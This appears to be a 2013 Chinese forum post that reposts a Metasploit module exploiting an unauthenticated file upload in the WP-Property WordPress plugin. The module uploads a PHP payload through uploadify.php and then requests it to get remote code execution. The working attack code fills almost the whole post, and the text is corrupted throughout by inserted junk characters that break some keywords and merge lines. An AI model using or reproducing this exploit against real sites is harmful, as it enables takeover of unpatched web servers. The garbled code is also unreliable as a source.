WordPress WP-Property PHP 文件上传漏洞$ v% n, H5 I9 x1 l5 M! T
. b0 ~: F! `8 ~* E- C$ s ## # This file is part of the Metasploit Framework and may be subject to7 f! p* b8 D- g9 ~
+ O, R# l9 z& V
# redistribution and commercial restrictions. Please see the Metasploit# g2 J! S3 Q" [
5 e) v. T' b3 h1 K1 U, L# Framework web site for more information on licensing and terms of use.% |# d7 I5 x' ^2 w8 {# R, x4 D3 ^+ a" Y
2 B1 V& z1 W! K f% f( \
# http://metasploit.com/framework/ ##1 R' G( q% A4 n% |+ O, v# l' x6 v
0 M! g" H, \' D* N
* R$ ]0 a5 o; ? z8 s
1 Q7 A- c7 [+ o$ v$ C# U; I
s/ g4 r' t$ x
* g- G/ K/ C, c! ~
require 'msf/core'0 J7 T" B7 t, K9 J9 `
require 'msf/core/exploit/php_exe'
M. w. ^3 ?0 p2 ^6 Z) U* e! V' `3 H" ^' B% L+ i
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',- M+ G" E2 F4 v& i/ V
'Description' => %q{2 k- V- s" X1 i8 l- G
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>; d% N5 {4 M6 r& w5 Q3 E, T
[$ V( X' b3 r/ \
'Sammy FORGIT', # initial discovery
: p# H7 R' n! @'James Fitts <fitts.james[at]gmail.com>' # metasploit module9 u" V8 G3 K1 o- ]8 F* ?6 c2 U
],
* k; I9 u" K9 v8 e. P3 s5 ]6 M; T+ c'License' => MSF_LICENSE,& _7 O# j) A: L' a3 |
'References' =>
8 I/ W# r. u$ @% T[
" A7 Z) m6 X; M1 C' k[ 'OSVDB', '82656' ],
0 w+ o: z9 X e. `) d[ 'BID', '53787' ],
; S% o; t+ T# b9 W# n- ~[ 'EDB', '18987'],* @% m9 p! \( l( {2 @1 a
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
& c/ F) Q! Y2 M$ G],
- B7 p0 ` r6 S/ i7 }! f! x, Q5 t'Payload' =>
3 q/ x1 x- e% Y% ]5 K# C{
9 K( d; a/ j' I2 g$ n'BadChars' => "\x00",9 c i* C3 q/ X2 G; T
},4 K$ P7 p* d" g2 {+ w3 {
'Platform' => 'php',: ^7 H& u1 L0 o5 y1 L. y+ d6 O9 k% X
'Arch' => ARCH_PHP,& _3 U2 f7 f; r/ B* c
'Targets' =>
$ r$ M2 K' \" R, }; {7 Y[9 W% M6 j, q5 r1 ^/ h& Q1 D6 J. n
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
7 A2 ], j# _/ I7 c/ h[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]& ?0 A, J5 n9 t! n/ Y% y/ {
],3 }' O% E# G8 [& l2 Q
'DefaultTarget' => 0,9 w& }4 j, a# Z1 {* R4 D1 L
'DisclosureDate' => 'Mar 26 2012'))
2 k$ v, a2 C8 c0 l4 h4 ^+ L; n' p9 I* e Z8 a
register_options(
5 z6 u6 d9 s$ I6 M2 _6 m# v[
0 G% s5 z+ J. _9 vOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
( }- n! G8 d5 ]], self.class)) U6 |3 _8 B3 O0 ^# E* o
end; t9 Z3 |$ A, m6 I
$ {, k9 D2 v( L: vdef check
# }2 M+ B& A' suri = target_uri.path
/ A4 [0 @$ s4 r) t" W$ Kuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',1 s! o2 V- z7 V( N& X
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
$ b, x$ o; r4 X# F) Q- ?/ }})
9 C2 }+ E% |( M0 e7 E* q
) `4 o% E8 ~8 K5 ], Tif not res or res.code != 200
! ~* V( p0 T/ |. g3 z1 oreturn Exploit::CheckCode::Unknown( `5 ]8 ^( K c
end7 L; U0 H( ]% s
! ~- u6 D+ l1 ^; e" ~* N3 C; N- \& d
return Exploit::CheckCode::Appears
5 J/ q- Z- b% x/ j/ q, yend
$ \+ q) q4 x4 d/ f- }; {
0 a' d% M" ? u- S# |) Ydef exploit( I& e" a& i, k
uri = target_uri.path- A5 {- v6 L: L
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
( f- r4 F! c1 ? ^, P8 f9 i6 m4 K# C" m f$ I5 b
data = Rex::MIME::Message.new
, H- l5 r! ]# qdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
# _) o, |, F; i+ ]data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")( C+ L; U4 }5 j4 v! @; a
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
- i( y8 y5 _- g5 G+ a! ^
3 A! W( }$ I9 m1 K8 u! hprint_status("#{peer} - Uploading payload #{@payload_name}")
! f, U3 S: Z1 z0 R* lres = send_request_cgi({
: c' n+ ]& `/ q4 [9 y; J'method' => 'POST',
" @8 f3 k& x G2 v'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",/ F1 T0 U' p7 v
'ctype' => "multipart/form-data; boundary=#{data.bound}",% {% A% D0 ~" ^8 m5 `) }
'data' => post_data
- J, i4 a8 `" I% n! M; q})
6 h$ V# m, p5 X/ m( Y) }7 o6 b% s- @* \5 c2 j
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
) b8 m; e2 k8 ^* V' n8 E9 R. pfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
3 | C: ~, {$ X6 h! I& a+ Jend
( T+ H2 d3 h" ~
! Q& k0 s4 j( u# yupload_uri = res.body( j- q. z3 J; W) N
4 Q" V- j) Z# ?: x
print_status("#{peer} - Executing payload #{@payload_name}")
1 y! U! e5 A2 i6 T$ Q$ x+ fres = send_request_raw({4 ?! V( k9 h" O* e+ ~! w
'uri' => upload_uri,
6 D; K3 f) d% @. P% ]'method' => 'GET'2 P' b2 |7 y9 h$ J% O) r. G% X
})
) ^& m! H" e! M7 lend
7 ~! H4 v0 z2 |end
) k' W3 b5 b% S6 A2 M) A/ Q& m- F2 E- p
不要问我这写的是什么 怎么利用 我是说msf.; _3 e* r# l0 |4 o, _& Y
' M: q" f; G/ B0 }
|
发表于 2013-1-4 19:51:30
收藏
支持
反对